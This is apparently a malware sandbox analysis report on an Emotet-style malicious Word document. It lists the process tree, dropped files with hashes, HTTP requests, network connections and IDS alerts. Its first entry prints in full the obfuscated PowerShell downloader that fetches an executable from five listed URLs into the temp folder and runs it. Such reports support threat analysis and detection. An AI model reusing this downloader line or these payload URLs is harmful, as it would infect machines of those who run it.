3172 | powershell $u5844='d1794';$h9410=new-object Net.WebClient;$k3609='http://ahluniversity.com/lW8Z9O0kOlt@http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu@http://ptof.club/wcy1UGRiD991_fsn@http://airconpro.co.za/YfhHLpgsKJ0v_Fde@http://schapenbedrijf.nl/e8eGE3bFrc80tWMb'.Split('@');$j3794='o6522';$v4337 = '269';$u4407='a4499';$s8986=$env:temp+'\'+$v4337+'.exe';foreach($o5176 in $k3609){try{$h9410.DownloadFile($o5176, $s8986);$m1861='d1965';If ((Get-Item $s8986).length -ge 40000) {Invoke-Item $s8986;$w1514='m1598';break;}}catch{}}$p8366='b3451'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3504 | "C:\Users\admin\AppData\Local\Temp\269.exe" | C:\Users\admin\AppData\Local\Temp\269.exe | — | powershell.exe |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
2468 | "C:\Users\admin\AppData\Local\Temp\269.exe" | C:\Users\admin\AppData\Local\Temp\269.exe | 269.exe | |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
296 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | 269.exe |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
2824 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Version: 3.0.69 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE8FC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15537A9C.jpg | — | |
MD5:— | SHA256:— | |||
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ETA1VRVI8LW1303ZQQ7R.temp | — | |
MD5:— | SHA256:— | |||
3172 | powershell.exe | C:\Users\admin\AppData\Local\Temp\269.exe | — | |
MD5:— | SHA256:— | |||
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:E06109969FEBE50C3AE71B5B04150D54 | SHA256:347F2E6A51A90F23672DD1432113232728893CF9AC1E28D88F701F2A6A923FCE | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:5668E0BECA7260FE57640A54FBAEC98C | SHA256:F31166347156B1F55AC9D8543E3751068AAE8BB7A649F271617CCF59E1E3BEBA | |||
2468 | 269.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:69A348DF3D2DD26C01B0D943014A3681 | SHA256:E2336EB2A1DB7A170E0790DC5A0E1F0CF9CEDD76EAB4842AD7424A5CFA3CB569 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$616586598.doc | pgc | |
MD5:BA8DFD296864750F0DB790346614E69E | SHA256:ED78B104B33BDD32D3E811C2402ACC901A802A24C95C510C28A87487B9DE3399 | |||
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f90a.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3172 | powershell.exe | GET | 301 | 192.185.52.164:80 | http://ahluniversity.com/lW8Z9O0kOlt | US | html | 312 b | malicious |
3172 | powershell.exe | GET | 200 | 192.185.52.164:80 | http://ahluniversity.com/lW8Z9O0kOlt/ | US | html | 506 b | malicious |
3172 | powershell.exe | GET | 301 | 192.185.20.9:80 | http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu | US | html | 339 b | suspicious |
3172 | powershell.exe | GET | 200 | 192.185.20.9:80 | http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu/ | US | executable | 545 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2824 | wabmetagen.exe | 182.176.106.43:995 | — | Pakistan Telecom Company Limited | PK | malicious |
3172 | powershell.exe | 192.185.52.164:80 | ahluniversity.com | CyrusOne LLC | US | malicious |
3172 | powershell.exe | 192.185.20.9:80 | www.megafighton.sandboxph.com | CyrusOne LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
ahluniversity.com |
| malicious |
www.megafighton.sandboxph.com |
| suspicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3172 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3172 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3172 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3172 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3172 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |